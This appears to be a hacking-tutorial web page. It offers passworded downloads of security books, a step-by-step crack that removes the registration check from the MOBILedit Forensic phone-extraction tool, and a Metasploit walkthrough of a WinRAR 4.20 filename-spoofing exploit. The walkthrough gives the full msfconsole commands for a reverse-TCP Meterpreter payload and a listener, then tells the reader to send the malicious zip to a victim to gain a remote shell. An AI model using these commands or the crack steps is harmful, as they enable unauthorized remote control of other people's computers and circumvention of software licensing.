Learning Metasploit Exploitation and Development


Password: www.hackingarticles.in

Web Penetration Testing with Kali Linux


Password: www.hackingarticles.in

Metasploit Penetration Testing Cookbook Combo Pack (1st+2nd Edition)



Password: www.hackingarticles.in

Hack MOBILedit Forensic 6.9 Registration (Easy Way)

With MOBILedit Forensic you can view, search or retrieve all data from a phone with only a few clicks. This data includes call history, phonebook, text messages, multimedia messages, files, calendars, notes, reminders and application data such as Skype, Dropbox, Evernote, etc. It will also retrieve all phone information such as IMEI, operating systems, firmware including SIM details (IMSI), ICCID and location area information. Where possible MOBILedit Forensic is also able to retrieve deleted data from phones and bypass the passcode, PIN and phone backup encryption



Step1:- Download Resource Hacker from Here

Step2:- Open Resource Hacker and click open.

Step3:- Choose C:\Program Files\MOBILedit! Forensic / MOBILeditFramework.exe


Step4: You’ll see lots of directories find ‘Dialog Section


Step5: Under Dialog Section find 148 right click on 1033 and Click on Delete Resource [Dialog: REMINDER: 1033]



Step6: Save as the file at another location. Please ensure that it must not be the original location of MOBILeditFramework.exe

Step7: Now copy the saved (new edited copy) of MOBILeditFramework.exe and paste it in its installation directory, and replace the original MOBILeditFramework.exe

Hack Remote Windows PC using WinRAR Filename Spoofing

This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in March 2014

Exploit Targets
WinRAR 4.20

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/winrar_name_spoofing
msf exploit (winrar_name_spoofing)>set payload windows/meterpreter/reverse_tcp
msf exploit (winrar_name_spoofing)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (winrar_name_spoofing)>exploit


After we successfully generate the malicious zip File, it will stored on your local computer
/root/.msf4/local/msf.zip


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit

Now send your msf.zip files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer